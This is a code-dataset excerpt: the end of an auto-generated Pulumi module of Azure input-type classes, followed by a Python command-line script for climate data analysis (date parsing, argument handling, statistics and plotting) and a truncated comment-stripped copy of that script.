    def result(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
        """Input property 'result'."""
        return pulumi.get(self, "result")
    @result.setter
    def result(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
        pulumi.set(self, "result", value)
@pulumi.input_type
class VirtualNetworkProfileArgs:
    """Virtual network profile; only the compute subnet id is configurable."""
    def __init__(__self__, *,
                 compute_subnet_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] compute_subnet_id: Wire property 'computeSubnetId'.
        """
        if compute_subnet_id is not None:
            pulumi.set(__self__, "compute_subnet_id", compute_subnet_id)
    @property
    @pulumi.getter(name="computeSubnetId")
    def compute_subnet_id(self) -> Optional[pulumi.Input[str]]:
        """Input property 'computeSubnetId'."""
        return pulumi.get(self, "compute_subnet_id")
    @compute_subnet_id.setter
    def compute_subnet_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compute_subnet_id", value)
@pulumi.input_type
class VulnerabilityAssessmentRecurringScansPropertiesArgs:
    """Recurring-scan settings for vulnerability assessment.

    'email_subscription_admins' defaults to True when not supplied.
    """
    def __init__(__self__, *,
                 email_subscription_admins: Optional[pulumi.Input[bool]] = None,
                 emails: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 is_enabled: Optional[pulumi.Input[bool]] = None):
        """
        :param pulumi.Input[bool] email_subscription_admins: Wire property 'emailSubscriptionAdmins'; defaults to True.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] emails: Recipient e-mail addresses.
        :param pulumi.Input[bool] is_enabled: Wire property 'isEnabled'.
        """
        # Explicit default: unset means True for email_subscription_admins.
        if email_subscription_admins is None:
            email_subscription_admins = True
        if email_subscription_admins is not None:
            pulumi.set(__self__, "email_subscription_admins", email_subscription_admins)
        if emails is not None:
            pulumi.set(__self__, "emails", emails)
        if is_enabled is not None:
            pulumi.set(__self__, "is_enabled", is_enabled)
    @property
    @pulumi.getter(name="emailSubscriptionAdmins")
    def email_subscription_admins(self) -> Optional[pulumi.Input[bool]]:
        """Input property 'emailSubscriptionAdmins'."""
        return pulumi.get(self, "email_subscription_admins")
    @email_subscription_admins.setter
    def email_subscription_admins(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "email_subscription_admins", value)
    @property
    @pulumi.getter
    def emails(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """Input property 'emails'."""
        return pulumi.get(self, "emails")
    @emails.setter
    def emails(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "emails", value)
    @property
    @pulumi.getter(name="isEnabled")
    def is_enabled(self) -> Optional[pulumi.Input[bool]]:
        """Input property 'isEnabled'."""
        return pulumi.get(self, "is_enabled")
    @is_enabled.setter
    def is_enabled(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_enabled", value)
@pulumi.input_type
class WorkspaceKeyDetailsArgs:
    """Details of a workspace key: key-vault URL and key name (both optional)."""
    def __init__(__self__, *,
                 key_vault_url: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] key_vault_url: Wire property 'keyVaultUrl'.
        :param pulumi.Input[str] name: Key name.
        """
        if key_vault_url is not None:
            pulumi.set(__self__, "key_vault_url", key_vault_url)
        if name is not None:
            pulumi.set(__self__, "name", name)
    @property
    @pulumi.getter(name="keyVaultUrl")
    def key_vault_url(self) -> Optional[pulumi.Input[str]]:
        """Input property 'keyVaultUrl'."""
        return pulumi.get(self, "key_vault_url")
    @key_vault_url.setter
    def key_vault_url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "key_vault_url", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'name'."""
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
@pulumi.input_type
class WorkspaceRepositoryConfigurationArgs:
    """Git repository configuration for a workspace (account, repo, branch, auth, etc.).

    All fields are optional; unset fields are not written to the property bag.
    """
    def __init__(__self__, *,
                 account_name: Optional[pulumi.Input[str]] = None,
                 client_id: Optional[pulumi.Input[str]] = None,
                 client_secret: Optional[pulumi.Input['GitHubClientSecretArgs']] = None,
                 collaboration_branch: Optional[pulumi.Input[str]] = None,
                 host_name: Optional[pulumi.Input[str]] = None,
                 last_commit_id: Optional[pulumi.Input[str]] = None,
                 project_name: Optional[pulumi.Input[str]] = None,
                 repository_name: Optional[pulumi.Input[str]] = None,
                 root_folder: Optional[pulumi.Input[str]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 type: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] account_name: Wire property 'accountName'.
        :param pulumi.Input[str] client_id: Wire property 'clientId'.
        :param pulumi.Input['GitHubClientSecretArgs'] client_secret: Wire property 'clientSecret'.
        :param pulumi.Input[str] collaboration_branch: Wire property 'collaborationBranch'.
        :param pulumi.Input[str] host_name: Wire property 'hostName'.
        :param pulumi.Input[str] last_commit_id: Wire property 'lastCommitId'.
        :param pulumi.Input[str] project_name: Wire property 'projectName'.
        :param pulumi.Input[str] repository_name: Wire property 'repositoryName'.
        :param pulumi.Input[str] root_folder: Wire property 'rootFolder'.
        :param pulumi.Input[str] tenant_id: Wire property 'tenantId'.
        :param pulumi.Input[str] type: Repository configuration type.
        """
        if account_name is not None:
            pulumi.set(__self__, "account_name", account_name)
        if client_id is not None:
            pulumi.set(__self__, "client_id", client_id)
        if client_secret is not None:
            pulumi.set(__self__, "client_secret", client_secret)
        if collaboration_branch is not None:
            pulumi.set(__self__, "collaboration_branch", collaboration_branch)
        if host_name is not None:
            pulumi.set(__self__, "host_name", host_name)
        if last_commit_id is not None:
            pulumi.set(__self__, "last_commit_id", last_commit_id)
        if project_name is not None:
            pulumi.set(__self__, "project_name", project_name)
        if repository_name is not None:
            pulumi.set(__self__, "repository_name", repository_name)
        if root_folder is not None:
            pulumi.set(__self__, "root_folder", root_folder)
        if tenant_id is not None:
            pulumi.set(__self__, "tenant_id", tenant_id)
        if type is not None:
            pulumi.set(__self__, "type", type)
    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'accountName'."""
        return pulumi.get(self, "account_name")
    @account_name.setter
    def account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_name", value)
    @property
    @pulumi.getter(name="clientId")
    def client_id(self) -> Optional[pulumi.Input[str]]:
        """Input property 'clientId'."""
        return pulumi.get(self, "client_id")
    @client_id.setter
    def client_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "client_id", value)
    @property
    @pulumi.getter(name="clientSecret")
    def client_secret(self) -> Optional[pulumi.Input['GitHubClientSecretArgs']]:
        """Input property 'clientSecret'."""
        return pulumi.get(self, "client_secret")
    @client_secret.setter
    def client_secret(self, value: Optional[pulumi.Input['GitHubClientSecretArgs']]):
        pulumi.set(self, "client_secret", value)
    @property
    @pulumi.getter(name="collaborationBranch")
    def collaboration_branch(self) -> Optional[pulumi.Input[str]]:
        """Input property 'collaborationBranch'."""
        return pulumi.get(self, "collaboration_branch")
    @collaboration_branch.setter
    def collaboration_branch(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "collaboration_branch", value)
    @property
    @pulumi.getter(name="hostName")
    def host_name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'hostName'."""
        return pulumi.get(self, "host_name")
    @host_name.setter
    def host_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "host_name", value)
    @property
    @pulumi.getter(name="lastCommitId")
    def last_commit_id(self) -> Optional[pulumi.Input[str]]:
        """Input property 'lastCommitId'."""
        return pulumi.get(self, "last_commit_id")
    @last_commit_id.setter
    def last_commit_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "last_commit_id", value)
    @property
    @pulumi.getter(name="projectName")
    def project_name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'projectName'."""
        return pulumi.get(self, "project_name")
    @project_name.setter
    def project_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_name", value)
    @property
    @pulumi.getter(name="repositoryName")
    def repository_name(self) -> Optional[pulumi.Input[str]]:
        """Input property 'repositoryName'."""
        return pulumi.get(self, "repository_name")
    @repository_name.setter
    def repository_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "repository_name", value)
    @property
    @pulumi.getter(name="rootFolder")
    def root_folder(self) -> Optional[pulumi.Input[str]]:
        """Input property 'rootFolder'."""
        return pulumi.get(self, "root_folder")
    @root_folder.setter
    def root_folder(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "root_folder", value)
    @property
    @pulumi.getter(name="tenantId")
    def tenant_id(self) -> Optional[pulumi.Input[str]]:
        """Input property 'tenantId'."""
        return pulumi.get(self, "tenant_id")
    @tenant_id.setter
    def tenant_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "tenant_id", value)
    @property
    @pulumi.getter
    def type(self) -> Optional[pulumi.Input[str]]:
        """Input property 'type'."""
        return pulumi.get(self, "type")
    @type.setter
    def type(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "type", value)
| true | true |
f725e9edf7e34a8ae2a8f7d0c50a703b007c2913 | 26,732 | py | Python | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | null | null | null | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | null | null | null | EZclim/user_entry.py | msc-acse/acse-9-independent-research-project-AdannaAkwats | 3a46de2e95b35ef095d2376e7237fad14e058b3e | [
"MIT"
] | 5 | 2019-06-21T16:14:28.000Z | 2021-01-22T07:53:54.000Z | """
Created by Adanna Akwataghibe (Github: AdannaAkwats)
"""
import argparse
from calendar import monthrange
from Extract import *
from Analysis import *
from WriteOutput import *
from plots import *
from utils import check_valid_order, check_analysis, check_variables_covary, print_end_statement
from calculate_indices import *
from file_entry import file_entry
from ProgressBar import *
# Booleans set when user gives a just a year (or a year and month)
class StartBools:
    """Module-level flags recording how much of a date the user supplied.

    Both flags are class attributes mutated by get_date()/user_entry(),
    i.e. shared global state rather than per-instance state.
    """
    # True when only a year (YYYY) was given.
    just_start_year = False
    # True when a year and month (YYYY-MM) were given.
    just_start_year_month = False
def get_date(date_entry, start=True):
    """
    Separate date d-m-y into day, month and year.

    Side effect: sets StartBools.just_start_year / just_start_year_month
    when the entry contains only a year, or only a year and month.

    :param date_entry: string containing date e.g. 2020-04
    :param start: if set, then it is the start date of the analysis, else it is the end date
    :return: day, month, year (all integers), or None when the entry
             cannot be parsed or is not a valid calendar date.
             NOTE(review): callers that tuple-unpack the result will raise
             TypeError on the None path — confirm this is intended.
    """
    try:
        date_ = map(int, date_entry.split('-'))
        date_list = list(date_)
    except ValueError:
        print("ERROR in function get_date(): Date written in unrecognisable format. Please try again.")
        return None
    len_d = len(date_list)
    # Defaults used when the entry omits day and/or month.
    day = 1
    # Month comes from the star-imported utils module — presumably an
    # int-valued enum/constant so datetime() accepts it; verify in utils.
    month = Month.January
    year = date_list[0]
    if len_d == 1:  # Only the year is given
        StartBools.just_start_year = True
        if not start:
            # End dates default to the last day of the year.
            day = 31
            month = Month.December
    elif len_d == 2:  # year and month are given
        StartBools.just_start_year_month = True
        month = date_list[1]
        if not start:
            # monthrange()[1] is the number of days in that month.
            day = monthrange(year, month)[1]
    elif len_d == 3:  # day, year and month are given
        day = date_list[2]
        month = date_list[1]
    else:
        # NOTE(review): execution continues with the defaults (day=1,
        # January) after this message — extra components are ignored.
        print("ERROR in function get_date(): too many split arguments")
    # check that these are valid dates
    try:
        datetime(year, month, day)
    except ValueError:
        print("ERROR in function get_date(): invalid date")
        return None
    return day, month, year
def user_entry():
"""
Get user input from command line or from input file and run full program.
"""
parser = argparse.ArgumentParser(prog='CLIMATE_ANALYSIS',
formatter_class=argparse.RawTextHelpFormatter,
description="""The functions will give statistical analysis of the climate data
presented
FILENAMES FORMAT
----------------
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR}.nc", where {START OF FILENAME} is
the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and {YEAR} is the year.
OR if you have multiple years stored in one file then:
- The filenames should be in the format "{START OF FILENAME}_ens{NUM}_{YEAR 1}_{YEAR 2}.nc", where
{START OF FILENAME} is the prefix of the file, this can be the algae type etc, {NUM} is the ensemble number and
{YEAR 1} and {YEAR 2} are the start and end year of the data in the file.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ASSUMPTIONS
------------
- Files do not have overlapped data.
- Daily increments of data, except if the monthly tag is set in the arguments.
- Grids have constant latitude and longitude.
------------
- Some example files are in the data folder.
""")
parser._optionals.title = "other arguments"
parser.add_argument('-pf', '--prefix', nargs='+', required=True, help="<Required> This is the prefix of the file - in the filenames format section, this is the START OF FILENAME.")
parser.add_argument('start_date', nargs='+', help="""Start date of analysis
Can be in the following formats:
----------------------------------
YYYY-MM-DD : e.g. 2020-04-12
YYYY-MM : e.g. 2020-04
YYYY : e.g. 2020
- If day is not given, the 1st of the given month will be used i.e 2020-04 => 2020-04-01
- If day and month is not given, 1st Jan will be used as the start date i.e 2020 => 2020-01-01""")
parser.add_argument('-end', '--end_date', nargs='*', help=""" <Not required> End date of analysis - format is the same as start_date
-----------------------------------end_date not given-------------------------------------
- If only start year is given, the end_date is automatically set to the 31 Dec of start year
- If start year and month is given, then end_date is set to the end of the start month
-----------------------------------end_date given-------------------------------------
- If day is not given, the end of the given month will be used i.e 2020-04 => 2020-04-30
- If day and month is not given, 31 Dec will be used as the end date i.e 2020 => 2020-12-31""")
parser.add_argument('-v', '--vars', nargs='+', metavar="variables", help="<Required> Variables of data to analyse",
required=True)
parser.add_argument('-p', '--plot', nargs=1, metavar=("ensemble_number"), help="""Plot map, histogram and timeseries graphs
E.g. --plot 1
The ensemble to plot must be included. """)
parser.add_argument('-m', '--monthly', action="store_true", help="Data in file is stored in monthly increments.")
group = parser.add_mutually_exclusive_group()
group.add_argument('-g', '--grid', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Grid Point: Latitude, Longitude
Uses grid point that latitude and longitude lies in.
Other commands:
- You can define a list of grid points in a .txt file e.g check INPUT/sample_points.txt
- Grid Point: sample_points.txt
- You can regrid to a grid (using nearest neighbour interpolation) defined in a NETCDF file:
- Grid Point: example_file.nc
Cannot be used in conjunction with sample point.
""")
group.add_argument('-s', '--sample', nargs='+', type=float, metavar=("(lat, lon) or filename or linear/rotate"),
help="""
Sample Point: Latitude, Longitude
Uses sample point given by latitude and longitude using interpolation.
Other commands:
- You can define a list of sample points in a .txt file e.g check INPUT/sample_points.txt
- Sample Point: sample_points.txt
- You can regrid to a grid (using linear interpolation) defined in a NETCDF file:
- Sample Point: example_file.nc
Cannot be used in conjunction with grid point.
""")
group.add_argument('-lc', '--lon_centre', nargs=1, type=float, help="Longitude to centre map on.")
parser.add_argument('-mk', '--mask', nargs=1, metavar="filename", help="Uses masking grid given as a file "
"(contains boolean array to be imposed on "
"the global grid).")
parser.add_argument('-o', '--output', action="store_true", help="If plot option selected, save data output of histogram and timeseries "
"analysis in "
+ directories.ANALYSIS + " as a .dat file.")
parser.add_argument('-cv', '--covary', action="store_true", help="Analysis on how the variables given in -v "
"vary with each other.")
parser.add_argument('-e', '--ens', nargs=1, type=int,
metavar="number_of_ensembles", help="<Required> The number of ensembles of the data. "
"If not set, the default value = 1", required=True)
parser.add_argument('-ht', '--hist', nargs='*',
metavar="number_of_bins_in_histogram", help=" Options for bin size selection. If not set, the "
"default value = fd (Freedman "
"Diaconis Estimator). The list of the potential "
"options are listed in: \n"
"https://docs.scipy.org/doc/numpy/reference/generated/numpy.histogram_bin_edges.html#numpy.histogram_bin_edges")
parser.add_argument('-u', '--user', nargs=2, metavar=('file_name', 'function_name'),
help="""Use function written by the user and stored in user_function folder for analysis.
file_name : name of file that contains function in user_function folder
function_name : name of function to call
Note: user functions are expected to only take in a cube as an argument. An example of a function
can be found in user_function/example_function.py
""")
parser.add_argument('-a', '--analysis', nargs='+', help="""Analysis performed on data set.
If not specified, then all analysis listed below will be performed.
Types of analysis:
- mean
- std (Standard deviation)
- rms (Root mean squared error)
- median
You can also select a combination of analysis to perform e.g. -a mean rms """)
parser.add_argument('-sp', '--spatial', action="store_true", help="Calculates averages spatially.")
parser.add_argument('-ca', '--areas', action="store_true", help="Calculate areas of grid boxes of latitude and"
" longitude and saves to NetCDF file areas.nc in results folder")
parser.add_argument('-t', '--total', action="store_true",
help="""Total ensemble stats: True/False : The analysis will be performed over the whole ensemble given.
- If set True, all the ensembles will be averaged as a collection.
- If set False, the ensembles will be averaged individually.""")
parser.add_argument('-i', '--index', metavar=('index'),
help="""Calculate index given
The control run is the FIRST file prefix set and the corresponding start/end date.
The future run is the SECOND file prefix set and the corresponding second start/end date
Types of inidices that can be calculated:
enso : The Oceanic Niño Index (ONI)
nino12 : Niño 1+2 Index
nino4 : Niño 4 Index
tni : The Trans-Niño Index (TNI)
iod : Indian Ocean Dipole (IOD) Mode Index
amo : Atlantic Multidecadal Oscillation (AMO) Index
pdo : Pacific Decadal Oscillation (PDO) Index
ao : Arctic Oscillation (AO; Northern Annular Mode) Index
aao : Antarctic Oscillation (AAO; Southern Annular Mode) Index
nao : North Atlantic Oscillation (NAO) Index
""")
# Log output
old_stdout = sys.stdout
log_file = open("output.log", "w")
sys.stdout = log_file
# Init progress bar
progress = ProgressBar(description='Climate Modelling software output', n_iter=5)
# Initialise the variables
algae_type, start, varbs, ens, end, analysis, spatial, total = None, None, None, None, None, None, None, None
plot, monthly, grid, sample, mask, output, covary, hist = None, None, None, None, None, None, None, None
lon_centre, func, calc_areas, index, lat, lon, points_sample_grid = None, None, None, None, None, None, None
second_date_given, start2, end2 = False, None, None
# If no arguments are given, use input file
if len(sys.argv) == 1:
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry()
elif len(sys.argv) == 2 and (sys.argv[1] == '-ex' or sys.argv[1] == '--example'):
algae_type, start, varbs, ens, end, analysis, spatial, total, plot, monthly, grid, sample, mask, output, covary, hist, lon_centre, func, calc_areas, index = file_entry(example=True)
else:
# Arguments
args = parser.parse_args()
algae_type = args.prefix
start = args.start_date
varbs = args.vars
ens = args.ens[0]
end = args.end_date
analysis = args.analysis
spatial = args.spatial
total = args.total
plot = args.plot
monthly = args.monthly
grid = args.grid
sample = args.sample
mask = args.mask
output = args.output
covary = args.covary
hist = args.hist
lon_centre = args.lon_centre
func = args.user
calc_areas = args.areas
index = args.index
# Update progress after getting input from user
progress.update()
# Get command line arguments
argv = 'python main.py'
argv = argv + ' ' + start[0]
if len(start) == 2:
argv = argv + start[1]
argv = argv + ' -pf ' + algae_type[0]
if len(algae_type) == 2:
argv = argv + ' ' + algae_type[1]
if end:
argv = argv + ' -end ' + end[0]
if len(end) == 2:
argv = argv + ' ' + end[1]
av = ' '.join(varbs)
argv = argv + ' -v ' + av + ' -e ' + str(ens)
if end and len(start) < len(end):
print("ERROR in function user_entry: Start dates are required.")
sys.exit()
if len(algae_type) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Prefix' argument.")
sys.exit()
if spatial and not analysis:
print("Error in function user_entry: Spatial argument cannot be set when no analysis is selected.")
sys.exit()
# All dates
day_s, mon_s, yr_s, day_e, mon_e, yr_e = None, None, None, None, None, None
day_s2, mon_s2, yr_s2, day_e2, mon_e2, yr_e2 = None, None, None, None, None, None
# Get split start date
if len(start) == 1:
day_s, mon_s, yr_s = get_date(start[0])
if not end: # If end date not given, use the end of start year
if StartBools.just_start_year:
end = str(yr_s)
elif StartBools.just_start_year_month:
end = str(yr_s) + "-" + str(mon_s)
else:
end = end[0]
# Get split end date
day_e, mon_e, yr_e = get_date(end, start=False)
# 2 end years must be given with 2 start years
if len(start) == 2 and len(end) != 2:
print("ERROR in function user_entry: Both end dates must be given with both start dates.")
sys.exit()
# If extra year is given
if len(start) == 2:
second_date_given = True
# Get first start date
StartBools.just_start_year, StartBools.just_start_year_month = False, False
day_s, mon_s, yr_s = get_date(start[0])
# Get first end date
fst_end = end[0]
day_e, mon_e, yr_e = get_date(fst_end, start=False)
# Get next start
day_s2, mon_s2, yr_s2 = get_date(start[1])
# Get next end date
end = end[1]
day_e2, mon_e2, yr_e2 = get_date(end, start=False)
elif len(start) > 2:
print("ERROR in function user_entry: Too many arguemnts given for 'Start date' argument.")
sys.exit()
# Print user input
print("Arguments:")
if len(algae_type) == 1:
print("- file prefix: ", algae_type[0])
if len(algae_type) == 2:
print("- first file prefix: ", algae_type[0])
print("- second file prefix: ", algae_type[1])
print("- variables: ", varbs)
print("- start date: " + str(yr_s) + "-" + str(mon_s) + "-" + str(day_s))
print("- end date: " + str(yr_e) + "-" + str(mon_e) + "-" + str(day_e))
if second_date_given:
print("- second start date: " + str(yr_s2) + "-" + str(mon_s2) + "-" + str(day_s2))
print("- second end date: " + str(yr_e2) + "-" + str(mon_e2) + "-" + str(day_e2))
# Check that dates are in valid order
is_valid = check_valid_order([day_s, mon_s, yr_s], [day_e, mon_e, yr_e])
if not is_valid:
print("ERROR in function user_entry: Invalid start and end date")
print(" - The end date is earlier than the start date")
sys.exit()
if second_date_given:
is_valid = check_valid_order([day_s2, mon_s2, yr_s2], [day_e2, mon_e2, yr_e2])
if not is_valid:
print("ERROR in function user_entry: Invalid second start and second end date")
print(" - The end date is earlier than the start date")
sys.exit()
print("Number of ensembles:", ens)
if analysis:
print("Analysis: ", analysis)
a_ = ' '.join(analysis)
argv = argv + ' -a ' + a_
check_analysis(analysis)
if spatial:
print("Spatial analysis option selected.")
argv = argv + ' -sp'
if total:
print("Total ensemble stats option selected.")
argv = argv + ' -t'
if plot:
print("Plotting option selected.")
argv = argv + ' -p ' + str(plot[0])
else:
plot = None
if monthly:
print("Monthly date expected.")
argv = argv + ' -m'
if grid:
if len(grid) == 2:
lat, lon = grid[0], grid[1]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0]) + ' ' + str(grid[1])
elif len(grid) == 1:
# Check if txt or nc file or linear or rotate
check_sample_grid_one_arg(grid, 'user_entry')
points_sample_grid = grid[0]
print("Grid point option selected.")
argv = argv + ' -g ' + str(grid[0])
else:
print("ERROR in function user_entry: Grid point argument has invalid number of arguments.")
sys.exit()
elif sample:
if len(sample) == 2:
lat, lon = sample[0], sample[1]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0]) + ' ' + str(sample[1])
elif len(sample) == 1:
# Check if txt or nc file or linear or rotate
check_sample_grid_one_arg(sample, 'user_entry')
points_sample_grid = sample[0]
print("Sample point option selected.")
argv = argv + ' -s ' + str(sample[0])
else:
print("ERROR in function user_entry: Sample point argument has invalid number of arguments.")
sys.exit()
if mask:
if isinstance(mask, list):
mask = mask[0]
print("Masking grid option selected.")
argv = argv + ' -mk ' + mask
elif not mask:
mask = None
if output:
print("Save analysis data output selected.")
argv = argv + ' -o'
if covary:
print("Co-varying option selected.")
argv = argv + ' -cv'
check_variables_covary(varbs)
if not hist:
hist = ['fd']
elif hist:
argv = argv + ' -ht ' + str(hist[0])
if len(hist) == 2:
argv = argv + ' ' + str(hist[1])
elif len(hist) > 2:
print("ERROR in function user_entry: Histogram argument has invalid number of arguments.")
sys.exit()
print("Histogram bin selection option:", hist)
if func:
print("User function given: " + str(func[0]) + ", " + str(func[1]))
argv = argv + ' -u ' + func[0] + ' ' + func[1]
if calc_areas:
print("Calculate areas option selected.")
argv = argv + ' -ca'
# Check index is given with second date
if index and not second_date_given:
print("ERROR in function user_entry: Index must be given with a second start date set.")
sys.exit()
if index:
print("Index option selected: " + index)
argv = argv + ' -i'
if lon_centre:
lon_centre = lon_centre[0]
print("Longitude centering option selected.")
argv = argv + ' -lc ' + str(lon_centre)
elif not lon_centre:
lon_centre = None
# Call functions to perform analysis
start = [day_s, mon_s, yr_s]
end = [day_e, mon_e, yr_e]
if second_date_given:
start2 = [day_s2, mon_s2, yr_s2]
end2 = [day_e2, mon_e2, yr_e2]
# Update progress after processing input from user
progress.update()
# Calculate indices
if index: # Self contained action
calculate_index(algae_type, index, varbs, start, end, start2, end2, monthly=monthly, test=True)
# Update progress after calculating index
progress.update()
progress.finish()
sys.exit()
# EXTRACT DATA FROM FILES
extract = Extract(algae_type[0], varbs, start, end, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved, ens_files, abs_files, full_saved, dim_coords = extract.extract_data()
saved2, ens_files2, abs_files2, full_saved2 = None, None, None, None
if second_date_given:
at = None
if len(algae_type) == 2:
at = algae_type[1]
else:
at = algae_type[0]
extract = Extract(at, varbs, start2, end2, ens, monthly=monthly, lat=lat, lon=lon, grid=grid,
points_sample_grid=points_sample_grid,
lon_centre=lon_centre, maskfile=mask,
calc_areas=calc_areas)
saved2, ens_files2, abs_files2, full_saved2, _ = extract.extract_data()
# Update progress after extracting data
progress.update()
# COMPUTE ANALYSIS
anlys = Analysis(saved)
ens_stats, func_name, analysis_str, nan_indices = None, None, None, None
spat_calcs, spat_calcs2 = None, None
ens_stats2 = None
if func: # user analysis
file_name, func_name = func[0], func[1]
ens_stats = anlys.compute_user_analysis(file_name, func_name)
else:
if second_date_given:
ens_stats, spat_calcs, spat_calcs2, analysis_str, nan_indices= anlys.calc_stats_difference(saved2, analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
else:
ens_stats, analysis_str, nan_indices = anlys.compute_stats_analysis(analysis, total=total,
spatial=spatial, dim_coords=dim_coords)
# Warning for mask and sample/grid
if mask is not None and lat is not None:
print("WARNING: Please ensure that sample/grid point is in the masked region.")
# Update progress after computing analysis
progress.update()
# PLOTTING
try:
if plot is not None or output:
plot_ens_num = int(plot[0]) if plot is not None else 1
# Plot histogram
create_histogram(saved, ens_stats, start, end, varbs, sel=hist, monthly=monthly,
save_out=output, ens_num=plot_ens_num, cov=covary, mask=mask,
total=total, analysis_str=analysis_str, nan_indices=nan_indices, plot=plot,
second_date_given=second_date_given, start_date2=start2, end_date2=end2, spatial=spatial)
# Only plot timeseries and map if plot is enabled
if plot is not None:
# Only plot map of analysis if using analysis: mean, median, std or rms and NOT grid/sample point
if analysis_str:
if func is None or not func:
plot_map_analysis(ens_stats, varbs, save_out=output, ens_num=plot_ens_num,
analysis_str=analysis_str, total=total,
second_date_given=second_date_given)
else:
print("WARNING: Map not plotted as user function is used.")
else:
plot_map(saved, varbs, save_out=output, ens_num=plot_ens_num, total=total,
second_date_given=second_date_given)
# Plot time series and boxplot
if analysis_str:
create_timeseries_analysis(ens_stats, start, end, varbs, analysis_str, monthly=monthly,
save_out=output, ens_num=plot_ens_num,
second_date_given=second_date_given, total=total, spatial=spatial,
calcs=spat_calcs, calcs2=spat_calcs2, plot=plot, start2=start2, end2=end2)
else:
create_timeseries(saved, start, end, varbs,
save_out=output, ens_num=plot_ens_num, func_name=func_name, monthly=monthly,
second_date_given=second_date_given, plot=plot)
# Update progress after plotting
progress.update()
except Exception as err:
print("Exception thrown in function user_entry when plotting: " + str(err))
# WRITE ANALYSIS TO NETCDF FILE
if output:
wo = WriteOutput(ens_files, abs_files, ens_stats, analysis_str, varbs,
start, end, argv, saved, full_saved,
total=total, lon_centre=lon_centre,
mask=mask, lon=lon, lat=lat,
grid=grid, user_func=func_name,
points_sample_grid=points_sample_grid,
second_date_given=second_date_given, test=True)
wo.write_analysis_to_netcdf_file()
# Update progress after writing output
progress.update()
print("PROGRAM SUCCESSFUL - TERMINAL FINISHED.")
# End logging
sys.stdout = old_stdout
log_file.close()
progress.finish()
# Print to terminal when finished
print_end_statement()
# Show graphs
if plot is not None:
plt.show()
| 46.734266 | 189 | 0.567111 | import argparse
from calendar import monthrange
from Extract import *
from Analysis import *
from WriteOutput import *
from plots import *
from utils import check_valid_order, check_analysis, check_variables_covary, print_end_statement
from calculate_indices import *
from file_entry import file_entry
from ProgressBar import *
class StartBools:
    """Module-level flags recording the precision of the parsed start date.

    ``get_date`` sets these as a side effect; ``user_entry`` reads them to
    derive a matching default end date when the user supplied none.
    """

    # Start date was given as a bare year ("YYYY").
    just_start_year = False
    # Start date was given as year and month only ("YYYY-MM").
    just_start_year_month = False
def get_date(date_entry, start=True):
    """Parse a ``YYYY[-MM[-DD]]`` date string into ``(day, month, year)``.

    Missing components are defaulted: a start date snaps to the earliest
    possible day/month, an end date (``start=False``) to the latest.  As a
    side effect the ``StartBools`` flags are set so the caller knows how
    precise the supplied date was.

    :param date_entry: date string, e.g. ``"2020"``, ``"2020-04"`` or
        ``"2020-04-12"``.
    :param start: True when parsing a start date, False for an end date.
    :returns: ``(day, month, year)`` tuple, or ``None`` when the string
        cannot be parsed or is not a valid calendar date.
    """
    try:
        date_ = map(int, date_entry.split('-'))
        date_list = list(date_)
    except ValueError:
        print("ERROR in function get_date(): Date written in unrecognisable format. Please try again.")
        return None
    len_d = len(date_list)
    year = date_list[0]
    if len_d == 1:
        StartBools.just_start_year = True
        if start:
            day, month = 1, Month.January
        else:
            # End date defaults to the last day of the year.
            day, month = 31, Month.December
    elif len_d == 2:
        StartBools.just_start_year_month = True
        month = date_list[1]
        # End date defaults to the last day of the given month.
        day = 1 if start else monthrange(year, month)[1]
